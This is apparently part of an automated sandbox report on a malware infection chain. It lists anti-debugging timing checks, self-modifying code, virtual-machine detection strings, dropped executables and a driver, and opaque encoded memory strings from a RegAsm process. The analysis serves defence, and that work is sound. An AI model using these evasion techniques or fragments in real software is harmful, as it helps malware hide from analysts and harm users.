                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 9130DF second address: 9130E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 9084EC second address: 908514 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FFAC0BDB479h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007FFAC0BDB466h 0x00000014 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 9137FD second address: 913801 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 913801 second address: 913807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 913807 second address: 913837 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFAC1684462h 0x00000008 jmp 00007FFAC1684464h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 913C66 second address: 913C7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 js 00007FFAC0BDB46Ah 0x0000000e pushad 0x0000000f popad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 913C7B second address: 913C83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 9194C2 second address: 9194C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 9194C8 second address: 9194CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 9194CD second address: 9194E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC0BDB46Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FFAC0BDB48Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                            Tries to evade debugger and weak emulator (self modifying code)
                            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: F2EDE2 instructions caused by: Self-modifying code
                            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 10D5EB9 instructions caused by: Self-modifying code
                            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 10EAAD1 instructions caused by: Self-modifying code
                            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: F2EDB2 instructions caused by: Self-modifying code
                            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1167BE8 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 76EDE2 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 915EB9 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 92AAD1 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 76EDB2 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 9A7BE8 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeSpecial instruction interceptor: First address: 1666E12 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeSpecial instruction interceptor: First address: 16FB385 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeMemory allocated: 2694F180000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeMemory allocated: 26968C30000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeMemory allocated: 23B75F50000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeMemory allocated: 23B77900000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05660C36 rdtsc 0_2_05660C36
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1084Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1091Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1109Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1124Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1106Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1098Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1130Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4241Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5583Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3009
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[3].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1015826001\84d98ae8ad.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[3].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1015825001\65a8a64be3.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1015827001\eb571902cc.exeJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\lkpwsyczzfuj.sysJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1015829001\8d37f89c6f.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1015830001\d0e065d272.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\main\7z.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1015828001\cf4367ad3a.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1015824001\6351911f1d.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[2].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                            Source: C:\Users\user\AppData\Local\Temp\1015819001\XpAg0vN.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_7-5692
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeAPI coverage: 5.2 %
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7048Thread sleep count: 1084 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7048Thread sleep time: -2169084s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7200Thread sleep count: 1091 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7200Thread sleep time: -2183091s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7192Thread sleep count: 230 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7192Thread sleep time: -6900000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3584Thread sleep count: 1109 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3584Thread sleep time: -2219109s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7208Thread sleep count: 1124 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7208Thread sleep time: -2249124s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5236Thread sleep count: 1106 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5236Thread sleep time: -2213106s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4364Thread sleep count: 1098 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4364Thread sleep time: -2197098s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7172Thread sleep count: 1130 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7172Thread sleep time: -2261130s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4476Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exe TID: 3520Thread sleep time: -210000s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7828Thread sleep time: -3689348814741908s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2484Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exe TID: 4320Thread sleep time: -464232s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exe TID: 5856Thread sleep time: -434217s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exe TID: 7556Thread sleep time: -440220s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exe TID: 8116Thread sleep time: -374187s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exe TID: 2472Thread sleep time: -48000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exe TID: 7760Thread sleep time: -410205s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exe TID: 7756Thread sleep time: -416208s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exe TID: 5348Thread sleep time: -434217s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeLast function: Thread delayed
                            Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                            Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 27_2_00947978 FindFirstFileW,FindFirstFileW,free,27_2_00947978
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 27_2_0094881C free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free,27_2_0094881C
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 27_2_0094B5E0 GetSystemInfo,27_2_0094B5E0
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\extracted
                            Source: file.exe, file.exe, 00000000.00000002.1771601838.00000000010B7000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, skotes.exe, 00000001.00000002.1805754717.00000000008F7000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                            Source: RegAsm.exeBinary or memory string: IkSb6Ll0qJvsISzM78QJNGiLkq04uJTAqMTwnNi2nJPyqJvgqcTLnGHQn4gNaMuAycjAuOi4vMCIxNi7pnkRjwexOc3J5MuWZ7O6LZ3p2KPmTK+QETzLwtYBuZmo+DbwfbG5xOvKgJ3Ouh5+NholmxO+He25vP0KCNOjS77JwbHcqVgJ2DX3Uj5uQa5hO/WrLamdvkUy7y3RwnplXcmRsFGEqu1Fy+5dwZG8ABnX8IjIi5KWRr5tzPKOLjW/Im5OIkWH
                            Source: RegAsm.exeBinary or memory string: WROYZl//CRHd+uuCH+Gb/owT29Ys5ODanJqK+YaSxo5/zRFDiL5bCT8N3Y5/2xf90BkJ+Y/XiaBOY6YkP4n8XE89aESbzrvfJxtJ/qkMfcqVAQn4jdeNiX7HkNXIuYOVUQ06BJOWijlA0pONEGwP12wLOQnVxKJuvmyL+IiSyqZK5aeme+pHXQ/5SJVGjHxb480f5RmdDZCclmnhgFsenEw+RVCUj7tGFNe5wVWUfMaVEQqWLo/Rakz5zZlJuQ2VRSPd
                            Source: RegAsm.exeBinary or memory string: 4j5YE68pBdq4x2O3N6PuK9ghYibm8y+oQ45KYeUiznoibluZpnSZWPLOqrB2o74rQi7Lkn5LWZX3BhZuGqLOe4hm89cnky5RxAJ+CwMv01Viov5BpLKjn3tEEnNTM6M7Sior2+tbYm+TBLezvzOk16PzEuOi4vMCIxNt4icmRsn7x4Y3IxUY4x7x9DPvGGJfmIK+SX6owEY0OM6yxz7QV/Ju21OjglLy4lMiovJCuqOuM7Sy4m8b35bFcu4w5AVPy9hh
                            Source: RegAsm.exeBinary or memory string: mvK0nd9YAgI2o2VwBTfir43l0Sb3BkLuCwNvtsIWy3kCauknl7xrHtqTqlhGdh2Lk69H9SdrSQLvj+5pk3L2crXevygT01YSfhsyytn3Ym/H9nfL6PIFzv8oo7LHIi6mJhaaqONX/XpC5B4O2HLytxM/K7JrGMfy5AinnfoibqaoFqqo49sYhu4bEsrZ9mYce6Mfdrq2G/lDLxyvmCIyJvJuJvvXGgnirnd6Fpp5Eq+MZdAm9wZFzX+4ozLHIr7K0mrp
                            Source: RegAsm.exeBinary or memory string: Yn+qEfMmEeou6Jg4VpaRQjaAGlCXUdvIMjaQVmVgp4VrKgFHYVrH8zrA18FawPMGWxa1xgaLESOG4Yq/mlJLaGdjD5/f/uDV9vI0C7ECF9FLYl5ytIeTj7sCfrkJSTaG4h+n5LNeU0Vmci+Ls+npMiZJ8ibKA5/7Yu73ZALF+yI12oO0qKJfkgXWM6+Zlofe8LkJGQMvq/mAS2k40l4SB2Jvq5kavXnptg3XA2/a7ximTVpm96cTz7qieV5qHs5VVuOf
                            Source: RegAsm.exeBinary or memory string: anIs5xtKLjj5t5JCFZiQKvi+PuIuTi8n5RteITz7HUIyOueoVy8xMCw4Jq28qKOnv7a6pb6mq6Oio7Y5/SxFbiL7CEhnJucFVmEt1lBkb2ub3DVmciJMjy/kijn/mints5pRM42RJvqKMf+uf+D9a3N69ZdmHnuHoU+Bjjz5JnYi96QYCOW4OfmxkoIInJDusw4HIfexE0om5LGZb4GSmemKJBhvhp8VjoYy53cs6qsHKD7ioSLsp4bxH42LOOSLIv8r
                            Source: cad620f7d1.exe, 00000024.00000002.3122773825.0000000000B41000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                            Source: RegAsm.exeBinary or memory string: SfllpKhUnBhkKlzEH/NbmVxcjjCLnBkbyP4tZ65wXZnJ+UzXkE8+6Yu6bZEM7Siojn7JV5+OO0bT2sy/xVWSjIuOi4vMCIxNi7hnizvm07lIGIx8Z/7JXsqy4KJlo0rRK8v0nJxdHAgTa8zR7z+7zpwcnk7RaXt/jNyenbg4zZmb27m6xF1cGHtI2rvrTZNrrb0WntucJuQVHP5l6kzQaLshy/z9xBxYWbj/Axtd26GmaOWhSb7rCfgY4UkKfiiI+WOm
                            Source: cad620f7d1.exe, 00000024.00000002.3122773825.0000000000B0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
                            Source: cad620f7d1.exe, 00000024.00000002.3122773825.0000000000B41000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
                            Source: RegAsm.exeBinary or memory string: 5bqaFxGVj+GvHn29Mk1SC2dvbiv3MTWbdy7hsY3rd25utjZdWiNwZG8qywh2aXLQFG9ubzb8ebKBe2r/LsOfrO6GjTHxpZiOxZKMSbaCK4I2w5eQMvqsOOSmH1Io4Xr0jmxyvj5KUExva3P3Jhn/IkUr4y87mf/wlpmBWyzhI0pWOPm3knJcnJAj+jl+IfeqEmUm5LGZ79qYmYF77yhTVib6ifB5JvujJ+DvXrZpcmov5OJL6nF0cClVppoRpnpuJvC2
                            Source: RegAsm.exeBinary or memory string: vuvIuI4kjrisoK+em5vMvq3OOKiWimnIPykIvwoePGv6SDku8tRdmlyLlS9KkSoOP+j5K8u/yRuM2EnsTfxeyL9aeYaRno36ogOG1HWcP+aJTGWjOG4Leekr5d0+bi7hm9npycQuzfoiIJkb24TcTL+dCAv5yFlLf9tLfs2OHvmciyQqRi7Ei1Zui4MpC7wdT34YyfgNi1t/yxvOf87eK28qKMj+iZSYTrjC0t+J/MFUGg2JzwzMyT0gk76iPyoJ/s0f
                            Source: RegAsm.exeBinary or memory string: OKiSimn1HZubnE6+r5OK6ejp7+2uqW+pqujoqO2MSfIQWZqcowYg2FuOVmZMuWpV6aUZoz8enIi7mwm6roEbvkibg8672hSTm5xcjHzbTjhrx5+MvWtUjGkqC1ne3F0cNlnanJkJPSqTiqxtbYuI9xPa3N6nk2GZWcnRY+SnaSKni7hqizptxp3OfFBehpj5xdjcw57lmfg7XxuJ71ydHBhZiLxoEwsraK9vrW21lhkb2ubnIVmciJMjybsvlmdqrCcl
                            Source: RegAsm.exeBinary or memory string: m1PPnlQlpzZGw/5WMxEzx6Jv1xJgo2ej7sux8tJ+Nij91GcIl+LVBk6bcbasFzkjpdoiziJ1daN9F2a2dvhgFSW3Qx2WJrcmQk+jpKUTr0d7rcVm+UZmTVRHIi6nqRDz9xPP0tQkqasSpVbuuxfe26JvvoS1tyenYhQaaPr2RFejn1tClnanKnJP4ySnk68A5KaDE4KiUy/YU66Ys/JuSAOf+pJFWcOuG+AnYi+EM18x94KOYaYzb/GGom7h5OhmRwdH
                            Source: sUSFJjY.exe, 00000006.00000002.2609047190.000002694EFA2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: RegAsm.exeBinary or memory string: jn3sA9qQ6SEbIxvOzg0avcn7atSsri8rSY5OueAVyblqDr8sxp2m3pTIjx2IfmpL+yqTyGyuLytJjk654BXJuWoOvyzGnabeksiPHYh+akv7KpPIbK4vK0u6Z5Mk2J8Pzdy6TLttEysJ/o+UnEhPDAuOi4vMCIxNi7pnhQh/Jcj+qI18YQ8744j+jZSSTpBdibXFgIJDAgZHhI7760/mYQ5+Ysyr45iJ+C1MreBTSJknybkM3k9W21CI/mlJICHJrCIf
                            Source: RegAsm.exeBinary or memory string: ZVPDjqEk4iLOcLSjY58b1aLy8lMSovuZ6J9Z+Yo4b9SFl0vIn2U4SboLuiojn7JV5mOO0DT2My/x1WcjAuOi4vMCIxNi7pnkQg/B9+OcmHhZGPm5CUDDL9qj/hjiZFqTL6hThapGXwJG13bib6G2E340xyJuCkP0WpOumtaCZUqQZlOOqrIvmnJKaHJlqzMUGGBnQn04yFiZaNlZgQJuJ2cZ9BKetuWyznrSZVoTp2OLY43JCUjIWJlo0VL+IlbjJKvH
                            Source: RegAsm.exeBinary or memory string: uJvK2WSWtOO8zT0tJtiH5HkMvJuy+USuzraqmvqigu6Kivb61ttZIZG9rmzy7Z3IiTI8i5Ks5/zlJ5YBzEA30hGsFR/qAbwRu15WMhYkh8a5frCfkOGE4+2gu4TtEJPw+Rjj5O3Im+SBLSzfxdCH5OG+HgfSAjp9sLOOjB2Ep8q4RZzP6gpEMdCfosnI/4qOC5gaSkP+xAXpSpiLxoFS0Iud4ynh6bnAs7K9Lubqlvqaro6KjtslccGFmgsSoYncmRZE
                            Source: RegAsm.exeBinary or memory string: /oGUhE+48NL7m96cThLjxJyO++5PuWhmUXGhJE9Z5En+gZSET9piYSNI/G6OPslQjo677s+5aKZaXB6bjjvK08rMvet4mpnby8wOy81LSA6NSw/r5+gGIiNtZLGBp2Qp7+2uikhPDAuOi4vMCIxNi7pngQh/JYi+pg18Y847eNPy3p2aTpBdibXFgIJDAgZHhI7760/mYQ5+Ysyr45iJ+C1MreBTSJknybkM3k9W21CI/mlJICHJrCIfzLlsiyug0wyd
                            Source: RegAsm.exeBinary or memory string: 8GDQEMUxYZBgJKExYeClpWUQNGbGpyZGx3bm5xcnl6Jx4SDgcaHlYNBxoLBg0ODhRUGQ8SDwAICRYYBx8VWRYBHxRPHwoKE0kbBEccFwEOGREECAVKGwoIEhZOVlcKXWRwZG9rc3p2IBwcBgMHC1oYGhQEHkobChgSHAIUEw8TABdEGwQHGxpJBQMDGwZPXx0BUAgIGQYBDRNOARdSXBYbemRva3N6diAcHAYDBwtaGBoUBB5KGwoYEhwCFBMPEwAXRA
                            Source: sUSFJjY.exe, 00000006.00000002.2619824711.0000026950D01000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                            Source: RegAsm.exeBinary or memory string: ZKDgEHGxMQGBkbAw5yZA8YABoUHA1aDx4ATw8SDhdJAhgCHAsBDnF0cGFmanJkDwMcAlEXCwgBAmRva3N6dg0bDQIcGk8cEB0cFBQPcmQJGQ0cCAINEwEeRAwfARZWDxMDCxocCnoUGhMTHxoGDQMZTgAeBlkJGwAUABkHHxJJFAUVTxoHEwJUGwQfSgYdHBJubnFyeXoLAhYAGVMbEg0bBABPHAoZGAQZBAgecmQJBRwBA1IKHxoEDQEMUxkfGRoPFW
                            Source: sUSFJjY.exe, 00000006.00000002.2619824711.0000026950D01000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                            Source: RegAsm.exeBinary or memory string: FHbm5xO/Q1bzFPhSrzgVtmN4IvVL8bZTn5Cp6NaTqbo/dRXgWKOFGROek4aYy1MuK1gnZ/XG/xhjyPpy9phyxXBHYYYT7yeSb7sifguDuJeTpRFHcmYD0CbFuO7a867R9nJuU9VjkyXbyMppdCej7i7k7Xb25vdVkAVDEu6bYELSgvMDAvOCYxLjmsI/omUnEnPDAuOi4vMCIxNi7pngRjXhpKITryf5qRKG8jQL4+4DZOJyrkH35Ciznqv+GYa0SHL+
                            Source: RegAsm.exeBinary or memory string: bBxUZDQcIHgFsd25ucXJ5ehoVCR8EARsEEFIMBgYCGggUdHBhZmpyZA4WCk4QGyYcAhEDHEsFGxocF2pnb25vehgaBgAKAxZEGhYCGxRSHxUcUAwGBQcJdhsXGxIKHRtaEhUeAgMGFwBsd25ucXJ5eh4VFgIKHR8YHVIMBgYCGggUdHBhZmpyZA0eMQgQHxAWF1AKAB9TCQMZAgUVGwsLeh8bUAACDgABHwRubnFyeXobHg8BBAQUVgcdDgJPAR1aAhE
                            Source: RegAsm.exeBinary or memory string: EeBhICUhADGE4dGR0LDm5wZG9rc3p2BRsIFQ4cFloTARdhZmpyZAAeDBwQAABaBhEXTwUcWhUAAgICHR1vehwdAxIPBBVECAQPTgIbHhQHHgNPCBYIAmlyamdvbm96HB0DEg8EFUQJFAodEFIKEwkeDQEMUxkTGwZqZ29ub3ocHQMSDwQVRAoWGg8dcnl6AxkXHAIdHVYZExgGAgsbHwMHcGFmanJkAR4dHRgcHlocAwVPCBYIAgAUAwQOGgp6HB0DEg
